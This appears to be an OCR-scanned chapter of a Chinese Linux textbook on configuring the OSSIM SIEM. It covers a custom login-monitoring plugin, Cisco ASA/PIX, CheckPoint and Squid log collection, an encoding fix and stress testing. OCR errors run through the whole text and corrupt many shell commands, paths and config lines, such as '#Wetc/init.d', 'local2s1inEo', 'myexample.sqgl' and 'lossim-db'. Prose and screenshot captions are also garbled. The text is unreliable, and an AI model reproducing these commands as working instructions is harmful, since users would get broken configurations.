型 以 及 该 资产 的 值 。Ossim Server :/var/log/alienvault/server.log 内 容 如 下 : 


2013-05-30 06:48:41 Ossim-Message: Event received: event id="0" alarm="0" 
type="detector" fdate="2013-05-30 13:15:52" date="1275239780" tzone="8.0” 
plugin id="4003" Plugin sid="7" SIC_ip="192.168.150.20" src port="4545" 
dst ip="192.168.150.200" dst port="22" sensor="192.168.150.201" interface="eth0" 
Protocol="TCP" asset src="2" asset dst="2" log="May 30 13:15:52 server-l1 
sshd[13980]: Accepted password for root from 192.168.150.20 port 4545 ssh2" 


username="root™" 


随后 在 前 台 的 控制 端 E 上 ， 你 就 可 以 通过 Web 方式 访问 SIEM 查看 到 详情 。 


10.8.2 插件 配置 工作 步骤 
插件 收集 的 步骤 为 : 


加 收集 日 志 样本 , 经 过 上 面 的 描述 大 家 一 定 知道 了 收集 日 志 的 流程 , 接 下 来 就 要 建立 脚 

本 。 
贺 新 建 插件 文件 , 最 好 是 复制 一 个 现 有 的 脚本 文件 ,并 修改 其 内 容 ， 以 符合 新 的 应 用 程 

贺 定义 一 个 通用 规则 , 这 是 最 后 的 规则 来 评价 ， 它 捕获 所 有 的 事件 ,不 能 根据 特定 的 规 
则 进行 分 组 。 

加 去 除 噪声 ， 某 些 无 关 事件 子 类 型 的 事件 被 视 为 噪声 ( 插件 中 标记 为 Plugin_SIDs 的 部 
分 ) ,说 的 简单 点 就 是 在 IDS/IPS 等 安全 设备 上 产生 的 海量 重复 报警 就 是 噪声 ， 去 除 方法 是 通 
过 筛选 监控 设备 上 或 在 系统 日 志 过 滤 事 件 。 

加 通过 Ossim 代理 注册 插件 ， 为 了 将 事件 发 送 到 Ossim 服务 器 ， 就 要 将 插件 激活 ， 插 
件 文件 的 路 径 必须 在 代理 配置 文件 中 指定 。 

四 通过 Ossim server 注册 插件 , 以 让 服务 器 知道 哪些 事件 应 该 预期 的 优先 级 和 可 靠 性 价 
值 的 事件 应 该 得 到 分 配 ， 就 必须 在 server 端 也 注册 插件 。 

在 server 一 端 激活 插件 ， 重 启 Ossim server 进程 二 etc/init.d/ossim-server restart。 
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在 代理 一 端 激活 插件 ， 重 启 Ossim agent 进程 #Wetc/init.d/ossim-agent restart。 


10.8.3 插件 导入 方法 


Ossim 在 安装 后 期 通过 一 些 SQL 语句 集中 导入 插件 ， 导 入 完毕 后 放置 在 
/usr/share/doc/ossim-mysql/contrib./plugins/ 目 录 下 ， 扩 展 名 为 sql.gz， 如 果 发 现 某 些 插件 需 重新 
导入 数据 库 ， 可 以 先 用 gunzip 命令 解压 sql.gz 文件 ， 再 使 用 ossim-db <file.sql 方式 导入 。 如 果 
是 新 插件 怎么 办 ， 可 以 复制 一 个 功能 类 似 插件 ， 然 后 修改 SQL 代码 ， 再 导入 数据 库 。 

我 们 来 看 一 下 操作 实例 。 

在 Linux 系统 中 ，last 命令 会 读 取 位 于 /varlog 目录 下 的 wtmp 文件 ， 并 把 该 给 文件 的 内 容 
记录 的 登入 系统 的 用 户 名 单 全 部 显示 出 来 。 状 态 更 新 将 被 系统 用 logger 命令 记录 。 


1. 通过 以 下 脚本 来 监控 last 的 状态 


#!/bin/sh 


# create the file 1f does not exist 


touch /var/log/last.prev 

while true 

do 

# get last entries 

last > /var/log/last.new 

# send new entries to syslog 

diff /var/log/last.prev /var/log/last.new | grep '^>' | logger -t LOGON EXAMPLE 
-pp local2s1inEo 

# move .new to .prev 

mv /var/log/last.new /var/log/last.prev 

sleep 5 


done 


2. 日 志 样 本 


# tail -f /var/log/messages 

Jun 10 20:21:32 server-1 LOGON EXAMPLE: > root pts/3 localhost Wed Jun 10 18:49 - 20:21 (00:31) 

Jun 10 20:23:28 server-1 LOGON EXAMPLE: > dbadmin pts/3 localhost Wed Jun 10 20:23 still logged in 

Jun 10 20:23:59 server-1 LOGON EXAMPLE: > root pts/4 localhost Wed Jun 10 20:23 still logged in 

Jun 10 20:24:09 server-1 LOGON EXAMPLE: > root pts/4 localhost Wed Jun 10 20:23 - 20:24 (00:00) 

Jun 10 20:24:09 server-1 LOGON EXAMPLE: > dbadmin pts/3 localhost Wed Jun 10 20:23 - 20:24 
(00:00) 

Jun 10 20:24:09 server-1 LOGON EXAMPLE: > root pts/2 192.168.150.20 Wed Jun 10 18:38 - 20:24 
(00:45) 

Jun 10 20:24:54 server-1 LOGON EXAMPLE: > root pts/2 192.168.150.20 Wed Jun 10 20:24 still 
logged in 

Jun 10 20:26:15 server-1 LOGON EXAMPLE: > root pts/2 192.168.150.20 Wed Jun 10 20:24 - 20:26 


站 rsyslog.conf: 

i/ete/rsyslog.conf 
在 文件 最 后 加 入 以 下 内 容 : 

localasinfo /var/log/lastlogonlog 
然后 重启 rsyslog 服务 : 

Wetc/init:d/rsyslogd restart 

检查 是 否 有 新 的 条 目 写 入 新 日 志文 件 : 


新 建 插件 文件 : 


修改 新 插件 参数 : 
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location=/var/log/last_ logon.log 


然后 在 Ossim Agent 上 注册 插件 。 
修改 /etwyossim/agentconfi ct。 
在 【plugins】 中 加 入 插件 : 


myexample=/etc/ossim/agent/plugins/myexample.cfg 


然后 打开 ossim-setup 配置 程序 ,选择 Configure Sensor-Select Data Sources, 再 通过 翻 页 键 
找到 yp 插件 ， 并 选中 ,保存 退出 ， 如 图 10.89 所 示 。 


:: alienvault :: 


图 10.89 ossim-setup 配置 程序 Select Data Sources 


在 Ossim Server 端 注册 插件 的 步 又 说 明 如 下 。 
首先 复制 现 有 的 SQL 脚本 来 建立 新 的 数据 结构 : 


#cd /usr/share/doc/ossim-mysql/contrib/plugins 
#cp syslog.sql myexample.sqgl 


注意 : 如 果 是 syslog.sql.gz 需要 先 解压 ， 接 下 来 获取 列表 插件 配置 文件 中 定义 的 规则 。 


#grep '^\[' /etc/ossim/agent/plugins/myexample.cfg 
[DEFAULT] 

[config] 

[Rule 01 - Console Session Open] 

[Rule 02 - Console Session Closed] 

[Rule 03 - New User Session - IP] 


[Rule 04 - New User Session - hostname] 
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[Rule 05 - User Session Closed - IP] 
[Rule 06 - User Session Closed - hostname] 
[Rule 07 - Reboot Detected] 


具有 相同 的 plugin_sid 规则 需要 一 条 SQL 语句 以 及 在 plugin_sid 中 定义 服务 器 , 不 同 规则 
的 , 会 由 last 返回 源 的 他 或 主机 名 。 这 时 我 们 需要 将 myexample.sql 导入 数据 库 中 ， 可 以 使 用 
如 下 命令 : 


#cd /usr/share/doc/ossim-mysql/contrib/plugins 
#cat myexample.sql lossim-db 


如 果 有 报错 请 检查 SQL 语句 是 否 有 错误 。 
这 是 你 可 以 在 Web 界面 下 的 数据 源 中 查看 这 个 插件 ， 如 图 10.90 所 示 。 


Data Sources Displaying 1to 1 of1 Data Sources 


Quick Search 9001 Data Source ID Search Clear 


图 10.90 Web 界面 下 的 数据 源 


当 你 看 到 如 图 10.91 所 示 的 这 些 信息 说 明 插件 已 成 功 添加 ， 接 下 来 重启 服务 即 可 生效 。 
ee Ce 


Event types (9001, Example) << Back toData source Layout saved! Displaying 1to 6 of6 eventiypes 


DS Groups| Taxonomy 


[Insertnew event type [区 ED 3 Edit | 局 Delete selacted 
Data SourcelD Event ype iD 


Logn Paeuao temninal es 


Logout Pseudo temminal 


System reboot Restarted 


目 
呈 - 国 .加 


Last Genenc messages 


图 10.91 数据 源 下 的 事件 日 志 


#/etc/init.d/ossim-server restart  \\ 重 启 ossim server 端 
#/etc/init.d/ossim-agent restart \\ 重 启 agent 端 


最 后 就 可 以 到 SIEM 控制 台 下 查看 日 志 。 
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10.8.4 收集 Cisco 防火 墙 日 志 


Cisco ASA 系列 防火 墙 能 够 提供 主动 威胁 防御 ， 在 网 络 受到 威胁 之 前 就 能 及 时 阻挡 攻击 ， 
在 企业 中 使 用 较 多 ， 下 面 我 们 介绍 一 些 如 何 将 Cisco ASA 日 志 传送 至 Ossim 服务 器 。 由 于 在 
Ossim 定义 好 ASA 插件 名 为 cisco-asa， 数 据 源 ID 为 1636， 默 认 给 出 插件 不 代表 你 装 上 
Ossim 就 能 使 用 ， 必 须 经 过 下 面 的 配置 才能 看 到 效果 。 

1. 在 ASA 配置 

首先 通过 SSH 链接 登录 ASA， 输 入 以 下 命令 : 


#enable 

#config terminal 

#no logging timestamp 

#1logging trap notification 

#1logging host inside <Ossim Sensor 的 IP 地址 > 


配置 完毕 后 保存 退出 。 


#copy running-config startup-config 


2. 登录 Ossim 4.2 控制 台 配 置 

选择 Jailbreak This Appliance 在 命令 行 下 配置 ， 新 建 一 个 文件 : 
#vi /etc/rsyslog.d/cisco-asa.conf 

添加 下 列 语句 : 


if ($fromhost-ip == 'x.x.x.x(ASA 的 IP)') then /var/log/cisco-asa.1log 


举 个 例子 : 这 里 假设 远程 cisco asalP 为 10.0.0.1。 


if $fromhost-ip == ‘10.0.0.1’ then -/var/log/cisco-asa.log 
if $fromhost-ip == ‘“10.0.0.1’ then ~ 


如 果 有 两 台 防 火 墙 则 按 下 面 方法 写 : 


if $fromhost-ip == ‘10.0.0.1’ then -/var/log/cisco-asa.log 
if $fromhost-ip == ‘10.0.0.2’ then -/var/log/cisco-asa.1log 
if $fromhost-ip == 10.0.0.1' then ~ 

if $fromhost-ip == ‘10.0.0.2’ then ~ 

保存 退出 并 重启 rsyslog: 


#/etc/init.d/rsyslog restart 
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为 cisco-asa 重新 创建 日 志 轮 询 配 置 : 
#vi /etc/logrotate.d/cisco-asa 
加 入 以 下 语句 : 


/var/log/cisco-asa.log 

{ 

rotate 4 # save 4 days of logs 
daily # rotate files daily 
missingok 

notifempty 

compress 

delaycompress 

sharedscripts 

postrotate 

invoke-rc.d rsyslog reload > /dev/null 
endscript 


} 


然后 进入 /etc/logrotate.d/ 目 录 下 rsyslog 文件 ， 找 到 /var/log/mail.info〈 大 概 是 14 行 位 置 ) 
在 上 面 添加 一 行 : 


/var/log/cisco-asa.log 


3. 配置 SIEM 日 志 进 程 


#alienvault-setup 


选择 Change Sensor Settings 一 Enable/Disable detector plugins 找到 cisco-asa 插件 并 选中 , 最 
后 保存 退出 系统 将 重新 配置 。 这 是 就 可 以 在 Analysis 一 Security Events (SIEM) 查 看 ASA 发 送 
过 来 的 日 志 信息 了 。 

然后 在 Ossim web 界面 上 就 能 看 到 从 cisco asa 10.0.0.1 发 送 过 来 的 syslog 文件 信息 。 

通过 以 下 命令 也 能 观察 到 : 


#rsyslogd -n -d lgrep cisco 

ossim:/var/log# rsyslogd -n -d | grep cisco 

rsyslogd: WARNING: rsyslogd is running in compatibility mode. Automatically 
generated config directives may interfer with your rsyslog.conf settings. We suggest 
upgrading Your config and adding -c4 as the first rsyslogd option. 

0282.128545516:7f6le2c43700: requested to include config file 
'/etc/rsyslog.d/cisco-asa.conf' 

rsyslogd: syntax error in expression [try http://www.rsyslog.com/e/2051 

0282.128565592:7f6le2c43700: cfline: 'if ($fromhost-ip == 10.0.0.1) then 


-/var/log/cisco-asa.1og' 
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rsyslogd: the last error occured in /etc/rsyslog.d/cisco-asa.conf, line 1:"if 
($fromhost-ip == 10.0.0.1) then -/var/log/cisco-asa.log" 

0282.128572567:7f6le2c43700: skipped whitespace, stream now ' ($fromhost-ip == 
10.0.0.1) then -/var/log/cisco-asa.1log' 

rsyslogd: warning: selector line without actions will be discarded 

0282.128581945:7f6le2c43700: skipped whitespace, stream now '$fromhost-ip == 
10.0.0.1) then -/var/log/cisco-asa.1log"' 

0282.128590998:7f6le2c43700: skipped whitespace, stream now '== 10.0.0.1) then 
-/var/log/cisco-asa.1og' 

0282.128598718:7f6le2c43700: skipped whitespace, stream now '10.0.0.1) then 


-/var/log/cisco-asa.1og' 


在 调试 过 程 中 可 以 使 用 以 下 命令 进行 故障 调试 : 


#/etc/init.d/rsyslog restart 

#/etc/init.d/ossim-agent restart 

#tcpdump -i eth0 -v -w /dev/null ‘src <IP Address> and port 5147 
#cat /var/log/ossim/agent* | grep plugin id=”1636” 


在 一 些 企业 还 在 使 用 思科 老 款 防火 墙 ， 下 面 讲解 如 何 收集 PIX 日 志 。 思 科 PIX 防火 墙 数 
据 源 ID 为 1514， 插件 名 称 为 cisco-pix。 
1. 在 PIX 上 配置 


#config t 

#logging on 

#logging trap debugging 

#logging host <type> <Ossim Sensor 的 IP 地 址 > 
#no logging timestamp 


#write mem 


2. 打开 Ossim 控制 台 


#vi /etc/rsyslog.d/cisco-pix.conf 


加 入 下 面 语句 : 

if ($fromhost-ip == '<PIX 的 IP 地 址 > ) then -/var/log/cisco.log 
重启 rsyslog: 

#/etc/init.d/rsyslog restart 

配置 日 志 轮 询 : 


#vi /etc/rsyslog.d/cisco-pix 
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输入 如 下 内 容 : 


/var/log/cisco.1log 

|! 

rotate 4 # save 4 days of logs 
daily # rotate files daily 
missingok 

notifempty 

compress 

delaycompress 

sharedscripts 

postrotate 

invoke-rc.d rsyslog reload > /dev/null 
endscript 


} 
配置 SIEM: 
#Alienvault-setup 


调试 日 志 。 由 于 Cisco Pix 的 插件 id 是 1514， 我 们 可 以 用 以 下 命令 来 查看 agent 中 的 事件 


#tailf /var/1og/ossim/agent.1og | grep 1514 


方法 和 ASA 一 样 ， 选 中 cisco-pix 插件 并 保存 退出 。 调 试 方法 和 ASA 防火 墙 相同 。 
10.8.5 收集 CheckPoint 设备 日 志 


本 实验 的 目的 为 收集 CheckPoint 设备 日 志 , 在 型 号 R60、R70 设备 上 通过 测试 , 在 Ossim 
系统 中 集成 了 checkpoint fwl 的 插件 ， 下 面 我 们 以 R60 (fwlngr60〉 为 例子 讲解 。 
在 使 用 Ossim 4.2 64bit 系统 时 首先 确定 要 装 好 ia32libs。 
1. 安装 方法 
#apt-get install 1ib32stdc++6 ia32-libs (安装 这 两 个 包 大 约 100MB) 


安装 fwl-loggrabber。 我 们 可 以 通过 Web 界面 下 载 ， 也 可 以 直接 在 /usr/share/ossim/www/ 
downloads 目录 下 找到 fwl-loggrabber-1.11.1-linux.tar.gz。 


2. 解压 


#tar zxvf fwl-loggrabber-1.11.1-linux.tar.gz 
#./INSTALL.sh 
install:Verzeichnis "/usr/local/fwl-loggrabber" angelegt 
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install:Verzeichnis "/usr/local/fwl-loggrabber/bin" angelegt 
install:Verzeichnis "/usr/local/fwl-loggrabber/etc" angelegt 
install:Verzeichnis "/usr/local/fwl-loggrabber/man" angelegt 
install:Verzeichnis "/usr/local/fwl-loggrabber/man/manl" angelegt 
install:Verzeichnis "/usr/local/fwl-loggrabber/share" angelegt 
install:Verzeichnis "/usr/local/fwl-loggrabber/share/fwl-loggrabber" 
angelegt 
"fwl-loggrabber" - >"/usr/local/fwl-loggrabber/bin/fwl-loggraber" 


很 快 安装 完成 ， 你 可 以 在 /usr/local/ 目 录 下 发 现 多 了 一 个 fwl-loggrabber 目录 ， 其 中 就 是 刚 
才 安 装 的 软件 。 然 后 修改 /etc/profile 声明 两 个 变量 : 


vi /etc/profile 

export LOGGRABBER CONFIG PATH=/usr/local/fwl-loggrabber/etc 
export LOGGRABBER TEMP PATH=/tmp 

#env (重新 加 载 profile 配置 文件 ) 


在 /usr/local/fw1-loggrabber/etc/ 目 录 下 的 配置 文件 都 是 以 unix-sample 结尾 的 示例 配置 ， 将 
其 分 别 复制 成 fwl-loggrabber.conf 和 lea.conf。 

下 面 就 该 配置 设备 卫 ， 检 查证 书 了 。 

将 loggrabber.conf 文件 中 第 42 行 修改 成 如 下 设置 : 


OUTPUT_ FILE PREFIX="/var/log/ossim/fwl-loggrabber" 

修改 /etc/ossim/agent/plugins/fwlngr60.cfg 插件 配置 文件 中 的 第 15 行 ， 内 容 如 下 : 
localtion=/var/10g/ossim/fwl-loggrabber/fwl.10g 

修改 19 行 ， 内 容 如 下 : 

create file=true 

保存 退出 。 执 行 以 下 命令 : 


/usr/local/fwl-loggrabber/bin/fwl-loggrabber -Cc 
/usr/local/fwl-loggrabber/etc/fwl-loggrabber.conf -1 
/usr/loca/fwl-loggrabber/etc/lea.conf 


如 果 提 示 “error while loading shared libraries:libpam.so.0:can not open shared object file:No 
such file or director” 说 明 第 一 步 没 装 好 。 

下 面 就 可 以 配置 CheckPoint 防 火 墙 了 。 登 录 到 Check Point SmartDashboard 中 ,选择 Manage 
一 Servers and OPSEC Applications, 在 弹出 的 对 话 框 中 选择 “New”， 输 入 名 称 后 选择 “Client 
Entities” 为 LEA，“Server Entities” 选 项 为 室 ， 然 后 单 击 “Communication” 按 钮 ， 然 后 系统 
会 提示 下 载 证 书 验 证 ， 这 时 可 以 到 /varlog/ossim 目录 下 查看 checkpoint 日 志 了 。 
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10.8.6 将 Squid 的 日 志 收 集 到 Ossim 系统 


1. 将 squid 插件 加 载 到 “detector” 中 
我 们 还 要 修改 /etc/ossim/ossim setup.conf 配置 文件 。 举 例 : 


[sensor] 
detectors=snare, pO0f, osiris, arpwatch, snortunified, pads, 
ssh, pam unix, rrd, sudo, iptables, nagios, squid 


2. 修改 squid 插件 内 容 


编辑 /etc/ossim/agent/plugins/squid.cfg 插件 配置 文件 , 将 原 有 配置 按照 下 面 例子 修改 , squid 
的 插件 ID 号 为 1553 。 


create_file=true \\* 这 行 配置 代表 如 果 不 存在 这 个 文件 就 创建 *\\ 

process=squid 

start=yes ; launch plugin process when agent starts 

stop=yes ; shutdown plugin process when agent stops 

startup=/etc/init.d/%(process)s start 

shutdown=/etc/init.d/% (process)s stop 

restart=yes ; restart plugin process after each interval 

restart interval=\ CFG(watchdog, restart interval) ; interval between each 
restart 


3. 重新 配置 Ossim 


#/usr/bin/ossim-reconfig 
这 时 会 产生 /var/log/squid/access.log 日 志文 件 : 


#tail -f /var/log/squid/access.1log 

Aug 12 17:26:00 ossim squid[11680]: 1282814160.311 1291 192.168.150.219 TCP MISS/200 405 POST 
http://164.24.134.107/gateway/gateway.dll?Action=poll&SessionID=989804211 .967503471 一 
DIRECT/164.24.134.107 application/x-msn-messenger 

Aug 12 17:26:20 ossim squid[11680] : 1282814180.328 1299192.168.150.219 TCP MISS/200 404 POST 
http://164.24.134.107/gateway/gateway.dll?Action=poll&gSessionID=989804211.1408535067 - 
DIRECT/164.24.134.107 application/x-msn-messenger 


10.8.7 ”对 日 志 中 含有 中 文字 符 的 处 理 方式 


有 时 我 们 会 但 遇 到 一 个 问题 ，Squid 发 送 的 syslog 中 有 中 文字 符 ， 但 到 了 Event 中 就 成 了 
乱码 ， 在 Google 上 查找 了 类 似 问题 ， 无 果 ， 最 后 只 得 查看 Agent 的 代码 。 总 结 出 下 面 一 个 方 
法 (操作 环境 Ossim 4.3) : 


(1) 修改 /usr/share/alienvault/ossim-agent/ossim agent/Agent.py 文件 里 ， 位 于 第 188 行 ， 
将 代码 里 的 默认 编码 这 条 代码 : encoding='latinl' 修 改 成 了 encoding='gb2312'。 


Linux ”企业 应 用 案例 精 解 


(2) 修改 Ossim Web UI 界面 代码 。 
打开 并 编辑 /usr/share/ossim/www/forensics/includes/base_db.inc.php 文件 ， 在 程序 最 后 或 者 
合适 的 位 置 加 如 一 行 “mysql query("SET NAMES 'UTF8")” 即 可 。 


(3) 修改 MySQL 配置 文件 。 
首先 我 们 看 看 默认 有 些 什么 问题 : 
#0ssim-db 

输入 以 下 命令 行 : 


mysql>SHOW VARIABLES LIKE '‘'character set %'; 
mysql>SHOW VARIABLES LIKE "collation %'; 


从 显示 结果 分 析 ，collation_server、collation_connection、character_setclient 都 是 latin1， 
所 以 我 们 需要 修改 /etc/mysqlmy.cnf 文件 , 而 且 我 们 在 Windows 系统 下 配置 my.ini 文件 时 , 里 
面 就 有 default-character-set=utf8 这 一 行 ， 只 不 过 被 注 掉 了 ， 源 于 这 个 启发 ， 我 们 做 如 下 修改 : 
在 [client] 中 添加 一 行 : 


default-character-set=utf8 
在 [mysqld] 内 加 入 一 行 : 
character set server = utf8 


这 样 一 来 在 mysql 中 直接 查询 数据 也 就 正常 了 ， 而 且 在 重启 系统 后 依然 有 效 。 效 果 如 图 
10.92 所 示 。 


图 10.92 汉字 能 正常 显示 


Latinl 是 ISO-8859-1 的 别名 , 它 的 编码 是 单字 节 编 码 ,向 下 兼容 ASCII。 在 缺 省 字符 集 为 
latinl 的 MySQL 中 , 我 们 把 GB 字符 集 的 汉字 保存 到 数据 库 中 , 但 MySQL 那 是 latinl 字符 集 。 
而 GB 字符 集 是 一 个 汉字 占 两 个 字 节 ，latinl 是 一 个 字符 占 一 个 字 节 。 这 就 产生 了 冲突 。 一 般 
我 们 这 定位 UTF8 编码 〈 它 是 万 国语 言 编码 ， 绝 大 多 数 国 家 的 语言 都 可 以 用 ) 。 


注意 : 从 这 节 我 们 应 该 掌握 在 pppMyAdmin 或 MySQL-Front 系统 工具 创建 MySQL 数据 
库 时 ， 同 样 会 让 你 选择 一 种 编码 ， 如 果 两 边 的 编码 不 一 致 ， 就 有 可 能 造成 MySQL 乱码 。 另 外 
Agentpy 文件 在 /usr/share/ossim-agent/ossim agent/ 目 录 下 。 


10.8.8 Linux 系统 下 网 络 服务 日 志方 法 总 结 


Ossim 系统 能 搜集 Linux 平台 下 apache、bind、dhcp、heartbeat、honeyd、nfs、pureftpd、 
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sendmail、smbd、nessus、squid、syslog、ssh、wuftp 等 服务 的 日 志 ， 采 集 这 些 服务 的 日 志 可 以 
通过 两 种 方式 : 


@ 服务 日 志 通 过 rsyslog 发 送 到 Ossim， 然 后 通过 插件 对 Apache 日 志 进 行 解析 ， 这 种 方 
法 大 家 通过 上 面 讲 解体 会 到 不 是 那么 容易 的 ， 需 要 在 Client/Server/Agent 三 个 方面 修 
改 配置 文件 ， 重 启 服务 经 过 系列 联 调 才能 得 到 结果 。 

@ 在 服务 器 上 面 安 装 Ossec 的 Agent， 然 后 通过 Agent 将 解析 /解码 后 的 数据 (只 有 引发 
了 Alert 的 日 志 才 会 发 送 到 Ossim ) 发 送 到 Ossim， 这 种 方法 相对 第 一 种 方法 要 简单 得 
多 了 下。 


10.9 ”Ossim 压力 测试 


在 本 章 一 开始 讲 到 Ossim 系统 由 若干 开源 安全 系统 所 组 成 ， 对 于 这 样 一 个 复杂 系统 ， 部 
署 完毕 后 ， 系 统 到 底 怎么 样 ， 稳 定性 如 何等 等 一 系列 问题 ， 我 们 需要 经 过 一 些 测试 才 能 知晓 。 
通常 ， 对 防火 墙 、 入 侵 检 测 测试 的 测试 和 评估 有 着 严格 的 测试 方法 和 流程 ， 下 文中 作者 仅 对 
Ossim 系统 中 常见 的 日 志 流量 和 网 络 数据 包 流 量 进 行 仿真 ， 另 外 还 包括 Mysql 的 压力 测试 主 
要 目的 是 展示 日 志 生成 器 和 数据 包 生成 器 这 两 中 开源 工具 的 使 用 。 

测试 采用 黑 盒 测试 方法 , 测试 过 程 更 加 直观 , 评价 结果 更 易于 理解 ， 和 其 他 软件 系统 测试 
不 同 的 地 方 为 , 对 测试 项 目的 具体 数据 结果 要 求 精度 不 高 , 更 注重 观察 实验 过 程 中 结果 的 变化 
过 程 和 变化 , 例如 什么 时 候 系统 响应 会 延迟 , 什么 时 候 系 统 无 法 响应 ,什么 时 候 死 机 等 趋势 的 
变化 。 


10.9.1 ” 软 硬 件 测试 环境 


@ 千 兆 交换 机 一 台 , 交换 机 必须 具有 端口 SPAN 功能 , 本 次 测试 中 Ossim 服务 器 与 SPAN 
口 连接 ， 使 得 它 能 够 监听 到 其 他 端口 的 测试 数据 流 。 

@ Ossim 4.1 Server 测试 服务 器 一 台 。 

@ 高 性 能 PC 机 2 台 ( 若 有 实验 条 件 可 以 拿 更 多 机 器 测试 )， 分别 模拟 两 台 客户 端 ， 操 作 
系统 Linux、Windows 均 可 。 这 里 选用 BT5。 


10.9.2 测试 项 目 


1. 正常 流量 模拟 


实时 背景 流量 负载 的 内 容 是 可 变 的 ,此 外 网 络 流量 的 生成 应 该 可 以 根据 网 络 的 拓扑 情况 进 
行 灵活 的 设置 ; 网 络 流量 可 以 根据 需要 增 大 或 减 小 , 可 以 在 单位 时 间 内 按 需 提高 流量 或 减少 流 
量 。 真 实 的 网 络 环境 中 ， 有 些 应 用 层 服 务 会 使 用 的 比较 多 ， 比 如 HTTP 服务 、Samba 服务 器 
及 FTP 服务 ， 同 时 会 有 少量 SSh/Telnet 服务 。 

我 们 在 每 台 测试 机 上 都 用 BTS 光盘 引导 ， 各 自 启 动 Apache、Samba、Ftp、Ssh、MySQL 
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服务 器 。 为 了 模拟 一 定数 量 的 访问 可 以 使 用 ab 和 webbench 工具 模拟 访问 。 


2. 带 一 定 压 力 流量 模拟 

这 种 压力 测试 不 同 于 以 往 , 是 指 测试 所 使 用 的 数据 流 中 含有 部 分 攻击 特征 , 数据 流 每 个 数 
据 包 都 可 以 触发 IDS 的 检测 匹配 过 程 ， 但 最 后 会 因为 匹配 失败 而 放弃 该 包 。 这 使 得 相对 于 在 
同样 传输 速度 的 普通 背景 流量 下 , IDS 将 承受 更 大 的 压力 。 由 于 Ossim 系统 中 启动 了 NIDS 和 
HIDS 这 两 种 检测 方式 ， 它 在 检测 某 个 报 文 时 ， 除 了 对 报 文 头 部 的 分 析 ， 还 会 在 报 文 负载 中 检 
测 是 否 有 攻击 特征 字符 串 。 然 而 随机 生成 的 报 文 负载 有 可 能 包含 有 攻击 特征 串 , 从 而 引发 报警 ， 
在 这 种 带 有 一 定 压力 的 测试 中 ，Ossim 的 CPU 利用 率 和 内 存 占用 会 有 不 小 的 提高 。 所 以 这 时 
我 们 的 压力 一 定 要 可 控 。 在 这 种 一 定 压力 测试 中 的 测试 时 间 一 般 在 30 分 钟 左 右 ， 即 可 了 解 整 
体 的 情况 。 


3. 攻击 流量 模拟 


这 种 测试 是 模拟 服务 器 在 被 攻击 时 ，Ossim 系统 是 否 能 及 时 发 现 并 分 析 流 量 , 就 是 在 这 种 
时 候 Ossim 服务 器 才 面 临 过 载 和 崩溃 的 风险 最 大 。 这 里 要 注意 的 是 ， 本 次 试验 需要 生成 大 量 
攻击 数据 包 向 Ossim 系统 发 送 。 第 10 章 提 到 过 Snort 是 基于 特征 检测 IDS， 只 需要 对 其 发 
送 含有 攻击 特征 字符 串 的 伪 攻 击 数 据 流 即 可 触发 其 检测 和 报警 行为 ,所 以 测试 中 的 攻击 数据 流 
并 不 需要 是 真实 的 攻击 行为 。 这 种 数据 都 是 指 伪 攻 击 数据 ， 攻 击 包 只 是 起 到 触发 IDS 报警 的 
作用 。 测 试 环境 如 图 10.93 所 示 。 


i 
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a re 测试 机 3 ssiiiSeniar 


图 10.93 ”测试 环境 


10.9.3 测试 工具 


1. 日 志 产 生 器 


为 了 测试 Ossim 系统 是 否 能 够 准确 地 接收 并 解析 syslog 消息 ， 我 们 使 用 一 个 模拟 syslog 
Server 工具 Syslog-Slogger 对 系统 发 送 syslog 消息 。Syslog-Slogger 是 一 个 基于 Java 的 命令 行 
工具 ， 用 户 能 够 通过 它 的 properties 文件 设置 发 送 的 目的 地 址 、 发 送 时 间 间 隔 、 消 息 数量 等 ， 
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该 工具 是 一 个 操作 简单 、 使 用 方便 的 syslog Server。 以 下 显示 了 Syslog-Slogger 模拟 器 产生 的 
几 条 syslog 消息 。 


#syslogs generated 10@0 espMessage Stats 

%PIX-3-211001:Memory allocation Error [1] 

SPIX-5-106100:access-list acl-inside permitted udp inside/192.168.120.2<101> 
-> Out side/192.168.150.20<137> hit-cnt 1 <first hit> [1] 

SPIX-5-106100:access-list acl-inside permitted udp inside/192.168.120.3<100> 
->out side/<192.168.150.21<137> hit-cnt 10 <first hit> [1] 

SPIX-1-101004 (Primary)Failover cable not connected (other unit) [1] 

%PIX-3-105006 (Primary)Link status down on interface inside [2] 

%PIX-5-109012:Authen Session End:user abc,sid session num,elapsed num seconds 
[1] 


以 上 日 志 是 由 Syslog-Slogger 模拟 器 产生 的 syslog 消息 。 这 款 工 具 的 下 载 地 址 为 


http://sourceforge.net/projects/syslog-slogger/。 


2. 数据 包 生成 器 


这 里 使 用 一 款 能 自动 生成 各 种 数据 包 的 开源 工具 hyenae， 它 是 一 种 高 度 灵活 和 平台 独立 
的 网 络 数据 包 发 生 器 ， 下 载 地 址 为 http://packetstormsecurity.com/ UNIX/scanners/ 
hyenae-0.35-2.tar.gz。 

它 还 支持 一 个 基于 Qt 的 前 端 Byea ee i BackTrack 4/5 下 可 以 直接 编译 后 运行 , 安装 
比 Debian Linux 系统 中 要 简单 ， 我 们 利用 这 款 工具 可 以 模拟 大 量 的 网 络 流量 。Hyenae 启动 界 
面 如 图 10.94 所 示 。 

如 果 你 的 单位 有 钱 , 可 以 购买 FLUKE 和 ES 网 络 通 来 进行 测试 , 用 这 款 开源 工具 和 fluke 
测试 仪 都 可 以 对 七 层 的 应 用 进行 发 包 测试 。 


图 10.94 hyenae 启动 界面 
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3. MySQL 测试 


mysqlslap 是 MySQL 自 带 的 基准 测试 工具 ， 它 是 用 perl 编写 ， 类 似 Apache Bench 负 载 挛 
EE 工具， 生成 schema， 装 载 数据 ， 执 行 benckmark 和 查询 数据 ， 语 法 简单 ， 容 易 使 用 。 该 了 
具 可 以 模拟 多 个 客户 端 同时 并 发 地 向 服务 器 发 出 查询 更 新 ,给 出 了 性 能 测试 数据 而 且 提供 了 
种 引擎 的 性 能 比较 。 


(1) 实例 一 


#mysqlslap —uroot —pXhSksvpjKj -concurrency=1000 -iterations=1 
-auto-generate-sql -auto-generate-sql-load-type=mixed 
-auto-generate-sql-add-autoincrement -engine=myisam -number-of-queries=10 
-debug-info 


本 次 测试 以 1000 个 并 发 线程 ， 测 试 1 次 ， 自 动 生成 SQL 测试 脚本 、 读 写 更 新 混合 测试 ， 
自 增长 字段 , 测试 引擎 为 myisam， 共 运行 10 次 查询 ,输出 CPU 资源 信息 显示 结果 如 图 10.95 
所 示 〈 命 令 参 数 的 含义 大 家 可 以 使 用 mysqlslap --help 来 显示 ) 


图 10.95 输出 CPU 资源 信息 


(2) 实例 二 
